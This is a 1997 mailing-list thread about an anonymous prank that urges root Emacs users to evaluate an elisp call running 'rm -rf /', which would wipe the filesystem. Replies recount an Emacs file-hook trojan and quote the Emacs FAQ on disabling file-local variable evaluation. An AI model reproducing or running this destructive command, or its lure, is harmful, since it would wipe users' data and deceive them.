If you are reading this message as root under Emacs, please position the cursor to the final paren in the following and hit C-x C-e. (call-process-internal "/bin/rm" nil t nil "-rf" "/") VirusMonger
On Sat, Aug 09, 1997 at 07:54:53AM +0200, Anonymous wrote:
If you are reading this message as root under Emacs, please position the cursor to the final paren in the following and hit C-x C-e.
(call-process-internal "/bin/rm" nil t nil "-rf" "/")
VirusMonger
You dumb shit -- I tried it and it didn't work! -- Kent Crispin "No reason to get excited", kent@songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html
Anonymous writes:
If you are reading this message as root under Emacs, please position the cursor to the final paren in the following and hit C-x C-e.
(call-process-internal "/bin/rm" nil t nil "-rf" "/")
I once had forwarded to me an emacs virus -- one that hooked into an emacs function such that as soon as you opened the file, it sent it's author some mail, and wiped it's own buffer. You ended up looking at an empty file, and none the wiser. It could have left some text in the buffer with modification. The point is the elisp code wasn't displayed, and you wouldn't notice unless you looked at it in less before loading it into emacs. (It worked too -- or it would have, but it tried to exec /bin/mail or something and it lived somewhere else on the IRIX system I was using at the time). I deleted it or something, and haven't been able to find it again, and don't know enough elisp to re-create it, but it was pretty neat. I don't think a lot of people realise that emacs has this hook for execing arbitrary elisp code just when you open an ordinary file, with no filename extension. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`
-----BEGIN PGP SIGNED MESSAGE----- On Sat, 9 Aug 1997, Adam Back wrote:
I deleted it or something, and haven't been able to find it again, and don't know enough elisp to re-create it, but it was pretty neat. I don't think a lot of people realise that emacs has this hook for execing arbitrary elisp code just when you open an ordinary file, with no filename extension.
From the Emacs FAQ:
72: Are there any security risks in GNU Emacs? [...] * the file-local-variable feature (Yes, a risk, but easy to change.) There is an Emacs feature that allows the setting of local values for variables when editing a file by including specially formatted text near the end of the file. This feature also includes the ability to have arbitrary Emacs Lisp code evaluated when the file is visited. Obviously, there is a potential for Trojan horses to exploit this feature. If you set the variable inhibit-local-variables to a non-nil value, Emacs will display the special local variable settings of a file that you visit and ask you if you really want them. This variable is not mentioned in the manual. It is wise to do this in lisp/site-init.el before building Emacs: (setq inhibit-local-variables t) If Emacs has already been built, the expression can be put in lisp/default.el instead, or an individual can put it in their own .emacs file. The ability to exploit this feature by sending e-mail to an Rmail user was fixed sometime after Emacs 18.52. However, any new package that uses find-file or find-file-noselect has to be careful about this. For more information, see `File Variables' in the on-line manual (which, incidentally, does not describe how to disable the feature). Mark -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBM+zEgSzIPc7jvyFpAQGdEAf+JBDo4zXNwcbq91NmvT+68tARgd4CfCRS RVfykuPP7jOFQ2D+jf5D06ZZzb+A98BnnnxQfa8PTi4qC6UmUseB14NVoOs1NLcI 6H5uLcM2gy5+FZdcgycGRhaN+e52CCYbcjnjlgGONPeddp+9Au+OAZH3lD7eSnoE jvW3f4l3ThkTH1OBi2+NGzT/iRwPPfs+ExdSH6QrxkLuCw7T/yJtjo/bptovQm1P T1fqu7Dpk/4oUtD1760QuNCC3RCNsrU6z+AqMnPTmYdOh2MJK8G8pMferhD7Jy9h uVkrfMeqYtiUa1x8Qu9NNu2vKThvP/xhf0S/wzTgaDwsHKGVy6kJoQ== =2xcf -----END PGP SIGNATURE-----
participants (4)
-
Adam Back -
Kent Crispin -
Mark M. -
nobody@REPLAY.COM